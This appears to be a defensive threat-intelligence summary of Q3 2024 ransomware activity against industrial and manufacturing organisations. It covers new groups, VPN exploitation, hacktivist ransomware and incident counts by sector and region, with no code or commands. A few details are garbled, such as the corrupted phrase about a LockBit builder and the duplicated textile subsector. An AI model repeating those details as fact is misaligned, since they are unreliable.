The threat of ransomware is a leading concern for industries globally. While ransomware attacks often target IT systems, the interconnectedness of operational technology (OT) and IT means that the disruption in one can often lead to disruptions in the other.
Nowhere is the risk more pronounced than in the manufacturing sector, where OT systems control the physical processes critical to production. Ransomware attacks can bring factories to a standstill.
The third quarter (July – September) of 2024 brought transformative shifts to the ransomware landscape, emphasizing its dynamic and continuously evolving nature. This highly active ecosystem was fuelled by new groups, rebranding existing entities, expansion of initial access broker operations, and proliferation of illicitly traded tools. Ransomware operators increasingly demonstrated their ability to pivot in response to disruptions during the third quarter, leveraging technological advancements and strategic realignments to maintain their operations.
Adding to this complexity, escalations in geopolitical tensions during the third quarter introduced a new dimension to ransomware threats. Specifically, conflicts in the Middle East and Eastern Europe spurred a rise in hacktivist personas employing ransomware to disrupt industrial operations. Unlike traditional financially motivated ransomware campaigns, these actors appear to prioritize operational sabotage, posing a distinct and potentially catastrophic risk to critical infrastructure.
The latest Dragos OT Cybersecurity Report documented 905 ransomware attacks impacting organizations in 2023, but the first three quarters of 2024 have already seen 1,033 incidents, signalling a troubling increase and underscoring the escalating threat to operational technology systems.
Emerging Ransomware Threats
In the third quarter of 2024, Dragos observed the emergence of several new ransomware groups, including Fog, Helldown, and RansomHub, impacting industrial organizations and multiple initial access and post-compromise techniques exploiting vulnerable remote and virtual network applications.
These newer ransomware groups consistently attacked industrial sectors, employing several advanced tactics to exploit operationally critical IT systems. Notably, their campaigns appeared to prioritize industries and organizations with a low tolerance for downtime, such as healthcare, financial services, and industrial operations. By focusing on environments where operational disruption can lead to cascading impacts, these groups increased the likelihood of ransom payments, leveraging the criticality of uninterrupted services to pressure victims.
Ransomware groups such as Fog, Helldown, and RansomHub were particularly active and gained traction by exploiting vulnerabilities in VPNs, and leveraging living-off-the-land techniques.
- Fog ransomware was first observed targeting virtual environments and backup systems critical to industrial operations. By exploiting vulnerabilities in hypervisors and backup solutions, Fog can encrypt virtual machine files and delete backups, significantly disrupting operational continuity.
- Helldown, leveraging tools from LocLockBit’saked builder, has been active in manufacturing sectors, leveraging sophisticated dual extortion techniques. The group has shown a propensity for credential harvesting and lateral movement using default administrative tools, ensuring persistence while maximizing impact.
- RansomHub, a RaaS operation, claimed over 300 victims globally in 2024. It has aggressively targeted industrial organizations in the energy, water management, transportation, and manufacturing sectors. Affiliates of RansomHub, including Velvet Tempest, have demonstrated advanced capabilities, such as deploying customized payloads and exploiting VPN vulnerabilities.
Other good examples that ransomware operators have shifted their intrusion TTPs to focusing on virtual networking applications are Eldorado and Play ransomware operators, who were observed targeting VMware ESXi environments.
Exploiting remote services and virtual networking applications was quite popular for ransomware operators in the third quarter. According to one source, approximately 30% of ransomware incidents during the third quarter were linked to vulnerabilities in VPN appliances (for example, CVE-2024-40766 affecting SonicWall SSL VPNs) or poorly managed credentials.
To highlight this operational shift:
- From 2021–2023: VPN exploitation was predominantly associated with opportunistic attacks, with actors focusing on unpatched vulnerabilities in devices like Pulse Secure and Fortinet. During these years, VPN access served primarily as an initial foothold for lateral movement or deploying ransomware payloads in high-profile cases like Colonial Pipeline (2021).
- In 2024: Ransomware operators have advanced their tactics by combining vulnerability exploitation with credential-based attacks to bypass multi-factor authentication (MFA) protections. They employ credential stuffing, pass-the-hash attacks, and brute force techniques. Compromised credentials, often sourced from Initial Access Brokers (IABs), have become central to their strategies. For instance, the Akira ransomware group has been observed exploiting vulnerabilities in VPN appliances to gain initial access to networks.
Advanced Lateral Movement and Persistence Techniques
Lastly, Dragos observed multiple ransomware groups that expanded their post-compromise lateral movement capabilities in the third quarter by blending traditional methods with advanced persistence mechanisms.
- Living-Off-the-Land Techniques (LOLTs): Ransomware operators evaded detection by mimicking legitimate network activity using legitimate administrative tools like PowerShell, certutil.exe, and PsExec.
- Abuse of Remote Access Tools: Tools like AnyDesk and Quick Assist continued to be exploited to establish persistent access. This quarter also saw increased use of remote access tools in conjunction with custom scripts designed to disable antivirus protection.
- Targeting Virtual Environments: Groups like Eldorado and Play developed Linux lockers specifically to target VMware ESXi environments. These lockers encrypt critical virtual machine files while disabling active VMs, disrupting business operations with minimal pre-encryption dwell time.
- Integration of Advanced Malware: Groups such as Black Basta shifted to custom malware, employed backdoor tools like SilentNight, tunnelling utilities like PortYard, and memory-only droppers like DawnCry to maintain persistence and evade endpoint detection.
Dragos assesses with moderate confidence that ransomware activity targeting industrial organizations will continue to escalate into the future. Although Dragos is unaware of any direct attacks on operational technology (OT) assets by the newly identified ransomware groups, ransomware-induced downtime in IT environments often halted industrial processes and led to financial losses, production delays, and safety risks. The interconnected nature of IT and OT networks continued to create dependencies that amplified disruptions from a successful ransomware incident.
Hacktivism and the Rise of Ransomware-Driven Operations
During the third quarter of 2024, Dragos observed an escalating trend of hacktivist groups integrating ransomware into their operations, signalling a significant shift in tactics and potential impact. Groups such as CyberVolk, Handala, and KillSec leveraged ransomware to amplify the disruption caused by their campaigns, blurring the lines between ideological activism and financially motivated cybercrime.
CyberVolk, in particular, represents a troubling development within the ransomware ecosystem. Operating under the alias “cybervolk_group” on social platforms, the group launched its own RaaS platform in June 2024 and announced the development of its proprietary CyberVolk ransomware in July 2024. This ransomware has been deployed in pro-Russian campaigns targeting critical infrastructure, combining encryption algorithms with advanced payload delivery mechanisms typically seen in financially motivated operations.
Although Dragos has not observed any direct impacts on industrial organizations during the third quarter of 2024, the growing sophistication and operational focus of groups like CyberVolk remain deeply concerning. The integration of ransomware into hacktivist operations represents a dangerous convergence of destructive malware and ideological motives, increasing the likelihood of significant impacts on critical infrastructure sectors in the future. This trend demands heightened vigilance, as it underscores the evolving risks posed by hacktivist groups leveraging ransomware for political and ideological ends.
Regional Impact Observations, Third Quarter of 2024
Ransomware incidents in the third quarter of 2024 demonstrated distinct regional variations, with North America continuing to experience the highest volume of attacks. The data reflects the global nature of ransomware threats, with every region affected to varying degrees. Oceania reported 12 incidents (approximately 2% of global ransomware activity). Australia and New Zealand were the primary targets, and the incidents impacted the technology, education, and healthcare sectors. While Australia’s manufacturing wasn’t a primary target in the third quarter, given the volume of ransomware attacks against this sector globally, it is plausible that Australia-based manufacturers may find themselves in a ransomware group’s crosshairs in Q4 and beyond.
Industry Impacts, Third Quarter of 2024
- The manufacturing sector was the most impacted, with 394 observed incidents, accounting for 71% of all ransomware incidents.
- Industrial control systems (ICS) equipment and engineering experienced 56 incidents, making up approximately 10% of the total incidents.
- The transportation sector faced 38 incidents, representing 7% of all observed incidents.
- Communications and electric each experienced 17 and 13 incidents, collectively making up approximately 5% of ransomware incidents.
- Oil and natural gas (ONG) recorded 13 incidents, reflecting 2% of the total incidents.
- Government sector entities faced 12 ransomware incidents, making up 2% of the total incidents.
- Water and wastewater entities faced five ransomware incidents.
- Mining faced three ransomware incidents.
- The data centre sector faced one ransomware incident.
In addition to the primary industries and sectors mentioned above, Dragos observed ransomware activity impacting 23 unique manufacturing subsectors in the third quarter of 2024. The percentage breakdown, based on all manufacturing incidents, is as follows:
- Construction: 117 incidents (30% of manufacturing incidents).
- Food & Beverage: 45 incidents (11%).
- Machinery and Equipment: Each had 27 incidents (7% each).
- Electronics: 28 incidents (7%).
- Consumer Goods: 26 incidents (6%).
- Automotive: 21 incidents (5%).
- Pharma: 16 incidents (4%).
- Textile: 15 incidents (4%).
- Metal: 12 incidents (3%).
- Healthcare: 11 incidents (3%).
- Agriculture: 10 incidents (3%).
- Aerospace, Chemical, and Electrical: Each had six incidents (2% each).
- Semiconductor: 5 incidents.
- Automation and Packaging: Each had four incidents.
- Defence, Paper and Plastics: Each had two incidents.
- Maritime, Recycling, and Textiles: Each had one incident.
As illustrated in Figure 3 below, ransomware incidents during the third quarter of 2024 have significantly increased compared to the previous quarter, with sectors such as manufacturing experiencing heightened activity. This trend highlights ransomware operators’ sustained focus on industries critical to operational continuity and infrastructure
Closing Thoughts
The third quarter of 2024 highlighted the ongoing evolution of ransomware threats. The industrial sector, particularly manufacturing and ICS equipment and engineering, remained a prime target, with ransomware operators leveraging advanced tactics and exploiting weak credential practices and vulnerabilities in remote access systems.
Organisations must prioritize strong cybersecurity measures to mitigate these threats, including monitoring critical ports, enforcing multi-factor authentication (MFA), maintaining offline backups, and securing remote access. Enhanced personnel training and continuous assessment of network architecture are critical to defending against evolving tactics.
As the ransomware landscape continues to fragment and adapt, proactive defences, intelligence sharing, and collaboration will remain essential to protecting critical infrastructure and industrial operations.
Read the full review here